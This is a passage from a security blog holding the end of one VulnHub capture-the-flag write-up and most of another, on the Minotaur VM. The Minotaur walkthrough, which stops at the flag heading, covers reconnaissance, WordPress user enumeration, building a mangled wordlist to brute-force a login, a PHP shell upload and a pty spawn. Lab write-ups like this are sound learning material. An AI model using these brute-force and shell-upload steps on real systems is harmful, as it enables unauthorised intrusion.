<br />
<br />
<br />
Time to check around the other directories for files of interest which may be password protected?!<br />
<br />
<span style="color: lime;">ls -la root/</span><br />
uhh.. flag.txt ?? God dammit TAPE .. lol :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/picard-double-facepalm-5_zpsdmux9oqv.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/picard-double-facepalm-5_zpsdmux9oqv.jpg" height="302" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>double facepalm</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I just wasted more time on either a random lost file, or a cunningly placed red herring :)<br />
<br />
<span style="color: lime;">cat root/flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/flag_zpsz8ik7n0e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/flag_zpsz8ik7n0e.png" height="220" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<i>Job Done :)</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><span style="color: yellow;">So.. lessons learned;</span></b><br />
<b><span style="color: yellow;">================</span></b><br />
1. If an exploit says something is vulnerable to SQLi, see whether you can dump databases before going batshit crazy on other hypothetical entry points..<br />
<br />
2. Carefully check your SQLi / sqlmap syntax.. missing quotes, slightly-off parameters will ruin your day..<br />
<br />
3. By all means note interesting files for future reference, but check other directories for interesting files as well before going all out on checking a single file when possibly others are out there.. lol..<br />
<br />
4. I dig Anime chicks :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/kusanagi_zpsmc5798qq.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/kusanagi_zpsmc5798qq.jpg" height="320" width="213" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>kusanagi.jpg from the OpenDocMan file manager</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Big thanks to c4b3rw0lf for the time invested in creating this fun challenge and big Up to VulnHub.com for hosting these challenges.<br />
<br />
<br /></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-8356530514965708840.post-11904008957841228682016-05-11T19:43:00.003+02:002016-05-11T22:10:09.263+02:00VulnHub -- SecTalks: BNE0x00 - Minotaur -- Writeup<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
So I had a crack at another VM from <a href="http://vulnhub.com/">vulnhub.com</a> called <a href="https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/" target="_blank">minotaur </a>and thought I would post<br />
my processes and failures on it !<br />
It's a fairly long an detailed post (image heavy!) but that's the way I like reading these things.. soo.. ;)<br />
<br />
Hints given ;<br />
<ol style="background-color: #f7f7f7; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; margin: 0px 0px 10px 25px; padding: 0px;">
<li style="margin: 0px;">This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.</li>
<li style="margin: 0px;">One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.</li>
</ol>
<br />
So starting off with the usual, using netdiscover to find host IP address ;<br />
(as before I use a homebrewed script to save those valuable seconds wasted on a few extra keystrokes.. ;) )<br />
<span style="color: lime;">netdiscover -i eth0 -p -r 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger-01_zpse2cleb7k.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger-01_zpse2cleb7k.png" height="336" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Run a quick test for robots.txt (a simple curl request would also do, or viewing output results from an nmap scan, but hey..)<br />
<span style="color: lime;">bash tools/robu.sh</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robu-01_zps3h1n4fbz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robu-01_zps3h1n4fbz.png" height="174" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nothing to see there, so move along to running an nmap scan using zenmap<br />
(I simply prefer the output view in a separate window that having it in another terminal window..)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap-01_zpskq8kyn9e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap-01_zpskq8kyn9e.png" height="640" width="632" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alright, so 3 open ports;<br />
<b>22</b> --> ssh<br />
<b>80</b> --> http (Apache 2.4.7)<br />
<b>2020</b> --> vsftpd ftp service with anonymous login authorized<br />
<br />
Nothing to see on port 80 but a standard Apache welcome page, no robots.txt either, I run a quick check with dirb to try some forced browsing but a quick dirb turns up empty handed ..<br />
<span style="color: lime;">dirb http://192.168.56.223</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/dirb-01_zpsk8xusvsz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/dirb-01_zpsk8xusvsz.png" height="436" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A tad disappointed, I decide to run a more detailed check by firing up, the in my case sorely underutilised, OWASP ZAP.<br />
I enter the IP details for a quick scan which doesn't show much too interesting.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-02_zpsdusbsgcl.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-02_zpsdusbsgcl.png" height="392" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So I then start up start a forced browsing attack with the dirbuster directory list wordlist.<br />
(standard wordlist can be edited from; Tools -> Options -> Forced Browse)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-04_zpsd5yg4hmr.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-04_zpsd5yg4hmr.png" height="498" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-03_zpsafldl7v9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-03_zpsafldl7v9.png" height="392" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
After a couple of minutes I see the subdirectory "bull" pop up. Yay ! something new to poke at.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-05_zpszdgd96zw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-05_zpszdgd96zw.png" height="392" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Checking out the webpage I am presented with a wordpress blog showing a rather disturbing furry and some seriously roided up cattle..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/funny-muscle-cow-bull-do-you-even-graze-pics_zpsx93nn3vn.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/funny-muscle-cow-bull-do-you-even-graze-pics_zpsx93nn3vn.jpg" height="249" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<i>Ho Lee Fuk.</i><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As the pictures were pretty prominent I decided to first have a quick look there.<br />
The images are rotating so I dig around with inspect element to find the directory where I can grab the images;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/inspectelement-01_zpsv1xdyxgk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/inspectelement-01_zpsv1xdyxgk.png" height="530" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So the pictures are all located at;<br />
<span style="color: lime;">http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/</span><br />
<br />
Let's download the pics for further analysis;<br />
<span style="color: lime;">wget -nd -r -l 1 -A jpg http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/</span><br />
<span style="color: lime;">ls -l *.jpg</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wget-jpg-01_zpsjrblojqx.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wget-jpg-01_zpsjrblojqx.png" height="180" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Brief checks on file info / basic stego / extraneous info / exifdata did not turn up anything significant;<br />
checking file information;<br />
<span style="color: lime;">for i in $(ls *.jpg) ; do file $i ; echo ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fileinfo-01_zps9kzt7ci0.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fileinfo-01_zps9kzt7ci0.png" height="324" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nope, nothing shocking here..<br />
<br />
checking for interesting data with exiftool;<br />
<span style="color: lime;">for i in $(ls *.jpg) ; do exiftool $i ; echo ; done</span><br />
Nope, nothing interesting there.<br />
<br />
checking if any <a href="http://adaywithtape.blogspot.nl/2013/01/data-obfuscation.html" target="_blank">extraneous info </a>at the end of the files;<br />
<span style="color: lime;">for i in $(ls *.jpg) ; do hd $i | tail -n2 ; echo ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-01_zpslqsgrmtp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-01_zpslqsgrmtp.png" height="312" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nope.. all ending with the expected FF D9 file trailer<br />
<br />
So checked if only 1 file trailer.. just to make sure no jpgs pasted together ;)<br />
<span style="color: lime;">for i in $(ls *.jpg) ; do echo $i ; hd $i | egrep -i 'ff d9|ff d9' ; echo ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-02_zpsbqewkswe.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-02_zpsbqewkswe.png" height="320" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Seems like all files only have one JPG file trailer, so would appear no jpg pasting going on..</div>
<div>
<br /></div>
<div>
checking if any info hidden with steghide without password;</div>
<span style="color: lime;">for i in $(ls *.jpg) ; do echo $i ; steghide extract -sf $i -p "" ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-01_zpsthcbizsq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-01_zpsthcbizsq.png" height="232" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Nope..</div>
<div>
<br /></div>
<div>
checking files for steghide info with worst 500 password list;</div>
<span style="color: lime;">for x in $(ls *.jpg) ; do bash tools/stegbrute.sh -i $x -w lists/501.txt ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-02_zpsm8iwevu1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-02_zpsm8iwevu1.png" height="312" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Bah.. Nope..<br />
So although very basic checks at this point, the only thing out of the ordinary is the comment " * " in the pakistani-bull1905608220146652615.jpg file, but nothing further identified on that or any of the other files.<br />
<br />
Enough time spent looking at the images for the time being. so time to move on..<br />
<br />
<br />
<b>WORDPRESS </b><br />
<b>===========</b><br />
As it is a wordpress site and wordpress quite frequently is in the news with vulnerabilities, lets<br />
try wpscan on the site and see what it spits out;<br />
<span style="color: lime;">wpscan -u http://192.168.56.223/bull/</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-01_zpswolq5nr0.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-01_zpswolq5nr0.png" height="604" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Oh yeah, this looks more like it..!<br />
<br />
Looking through the information and the named vulnerabilities, the arbitary file upload vulnerabilities look interesting, but still need an existing user & password.. boo.. :(<br />
<br />
Well, let's enumerate the site for users;<br />
<span style="color: lime;">wpscan -u http://192.168.56.223/bull/ -e u</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-02_zpsubpn8k3p.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-02_zpsubpn8k3p.png" height="170" width="400" /></a></div>
<br />
<br />
<br />
<i>This info can also easily be found by simply browsing through the blog.</i><br />
<br />
<br />
<br />
<br />
<br />
Great! we see user 'bully', a starting point to hacking a way in.<br />
wpscan also has a bruteforce option, so lets run a few wordlists on it..<br />
<br />
<b>BRUTE FORCE ATTACK ON WORDPRESS</b><br />
<b>===================================</b><br />
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/list.txt</span><br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-03_zpsmho7kc6x.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-03_zpsmho7kc6x.png" height="157" width="400" /></a></div>
<br />
<br />
<br />
<i>After trying several wordlists, I was constantly presented with similar results.. <b>Booo !</b></i><br />
<i>Time to try harder..</i><br />
<br />
<br />
<br />
hmm, no joy with the usual suspects :( hang on.. the hint did mention that a particular password would not be able to be found in the usual wordlists.. OK, time for plan B.</div>
With the great tool CeWL we can make a focussed wordlist based on all text, found on the wordpress site including filenames etc.<br />
<span style="color: lime;">cewl -d 5 -a -e http://192.168.56.223/bull/ -w kewl.txt</span><br />
Let's go and kick ass with our new found awesome wordlist!<br />
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/kewl.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-03_zpslawrduau.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-03_zpslawrduau.png" height="140" width="400" /></a></div>
<br />
<br />
<br />
<i>aaah, still no joy..</i><br />
<br />
<br />
<br />
<br />
<br />
OK, before we lose faith lets beef up (lol pun intended) the wordlist in stages.<br />
(correctly or incorrectly, I prefer starting with small lists and gradually going larger and larger instead of starting off with a huge list).<br />
As we are starting with a small wordlist, we can make certain string manipulations easily without creating a monster;<br />
- Letter case manipulation<br />
- Basic 'leetspeek' alterations<br />
<i>(Depending on how many character alterations you consider, that can however massively increase wordlist size, see an example of permutation possibilities with Gitsnik's awesome permute.pl script <a href="http://adaywithtape.blogspot.nl/2011/07/wordlist-manipulation-revisited.html" target="_blank">here</a>)</i><br />
<br />
Letter case manipulation can be done with simple sed / tr commands;<br />
<span style="color: lime;">cat kewl.txt > new.txt</span><br />
<span style="color: lime;">cat kewl.txt | sed -e 's/^./\u&/' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | sed -e 's/.$/\u&/' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | tr '[:lower:]' '[:upper:]' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | tr '[:upper:]' '[:lower:]' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | tr 'a-z A-Z' 'A-Z a-z' >> new.txt</span><br />
<div>
<span style="color: lime;">cat new.txt | sort | uniq > new1.txt</span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-02_zpsqpjbf8ce.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-02_zpsqpjbf8ce.png" height="568" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Alright lets run the new and improved wordlist ! </div>
<div>
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/new1.txt</span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-01_zpsseer8aqm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-01_zpsseer8aqm.png" height="140" width="400" /></a></div>
<br />
<br />
<br />
<i>crap..</i><br />
<br />
<br />
<br />
<br />
<br />
OK, let's include some basic leetspeak alterations based on the most used </div>
<div>
leetspeak permutations of a / e / l / o / t ;<br />
<span style="color: lime;">cat new1.txt | sed -e 's/a/4/g' -e 's/A/4/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/e/3/g' -e 's/E/3/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/l/1/g' -e 's/L/1/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/o/0/g' -e 's/O/0/g' >> new-leet.txt</span><br />
<div>
<span style="color: lime;">cat new1.txt | sed -e 's/t/7/g' -e 's/T/7/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/a/4/g' -e 's/A/4/g' -e 's/e/3/g' -e 's/E/3/g' -e 's/l/1/g' -e 's/L/1/g' -e 's/o/0/g' -e /O/0/g' -e 's/t/7/g' -e 's/T/7/g'</span></div>
<div>
<span style="color: lime;">cat new-leet.txt | sort | uniq > new.txt</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-03_zpsijjw0p8d.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-03_zpsijjw0p8d.png" height="640" width="571" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This method of 'leetifying' is not perfect, but its a decent start.<br />
<br />
Alright ! Now this wordlist is pretty pimped, surely now more success will be granted!<br />
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/new1.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-02_zpsdlrihhtw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-02_zpsdlrihhtw.png" height="140" width="400" /></a></div>
<br />
<br />
<br />
<i>fuckfuckfuck</i><br />
<br />
<br />
<br />
<br />
<br />
well that was a letdown.<br />
<br />
I was rather disappointed I wasn't getting anywhere with this approach as it means that we now need to consider adding/modifying common characters/phrases which starts getting pretty theoretical.<br />
Anyway, time for a new plan..<br />
<br />
<b><i>USING RULESETS</i></b><br />
<b><i>===============</i></b><br />
When bruteforcing a hash using hashcat, you can use a set of rules which do word manipulations on the fly. This prevents the creation of enormous wordlists and has proven very successful in cracking passwords.<br />
But.. no luxury of not having to create large wordlists in this case, so I need to get the stdout from the hashcat rules.<br />
This option is not possible using cudaHashcat or oclHashcat, so I run it on the cpu based hashcat version installed on Kali.<br />
In this case as the usual suspects (case and basic leetify options) yielded nothing I decide to go for the T0XlC ruleset that will do some pretty heavy word mangling.<br />
As a last ditch effort I can always look at the other rulesets, including for instance the d3ad0ne ruleset which I know will massively increase wordlist size.. and then, well, back to the drawing board.<br />
<br />
<span style="color: lime;">hashcat -r /usr/share/hashcat/rules/T0XlC.rule kewl.txt --stdout > t0xic.txt</span><br />
<div>
<span style="color: lime;">wc -l t0xic.txt</span></div>
<div>
oofff.. </div>
<div>
lemme sort and check for duplicates</div>
<div>
<span style="color: lime;">cat t0xic.txt | sort | uniq > big.txt</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/toxic-01_zpsowqtm4wx.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/toxic-01_zpsowqtm4wx.png" height="194" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
still an <b><i>ooff sheet </i></b>moment but managed to remove over 600k passphrases.<br />
I would normally cut out short passphrases as well, but since I want to go for broke, I decide to discard my usual methods, leave everything in and just run it.<br />
Oh dear Lord its slow.. 40 minutes in and it has only done 100,000 passphrases.. reportedly over 7 hours to complete.. omg.. being on VM's certainly does have some disadvantages.<br />
<i>(I would be interested to hear what other wordpress bruteforce tools you pros use, please leave a comment if you have a favourite!)</i><br />
<br />
Anyway I let it run and revisit the other ports and google to see whether any other entry method might suddenly jump out at me.</div>
<div>
Nothing did, so time for a beer and mindless izismile/imgur browsing..<br />
<br /></div>
Suddenly I hear the fan of my lappy quietening down.. oooh.. it hasnt yet been 7 hours..does this mean the crack has stopped with success?!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-success_zpsv6vurwhb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-success_zpsv6vurwhb.png" height="140" width="400" /></a></div>
<br />
<br />
<br />
<i>fuckyeah..</i><br />
<br />
<br />
<br />
<br />
<br />
YAY!<br />
<br />
<b>GAINING ACCESS</b><br />
<b>================</b><br />
So now we basically can go down 2 roads ;<br />
Either use the metasploit exploit;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit-01_zps2sgxdte3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit-01_zps2sgxdte3.png" height="332" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/expl-02_zpsplvia9qp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/expl-02_zpsplvia9qp.png" height="115" width="400" /></a></div>
<br />
<br />
<br />
<i>And we're in :)</i><br />
<br />
<br />
<br />
<br />
or manually create shell.php, upload, start listener and open php file in browser;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/php-bull_zpspyijfh7g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/php-bull_zpspyijfh7g.png" height="144" width="640" /></a></div>
<div>
<br /></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload-01_zps8ebntwut.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload-01_zps8ebntwut.png" height="545" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-01_zpsolwntnrf.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shell-01_zpsolwntnrf.png" height="153" width="400" /></a></div>
<br />
<br />
<br />
<br />
<i>And again, we're in :D</i><br />
<br />
<br />
<br />
<br />
<br />
Spawning terminal with ;<br />
<span style="color: lime;">python -c 'import pty; pty.spawn("/bin/bash")'</span><br />
<br />
Usually my feeling is simply; don't over-complicate things if a solution is readily available, use it for quick access..Metasploit is great for quick and easy shells.<br />
On the other hand, I like having Plan B's C's D's etc.. so knowing how to do things in another way is imperative and having a backup plan is always a must..<br />
<br />
<b>FLAGS YO!</b><br />
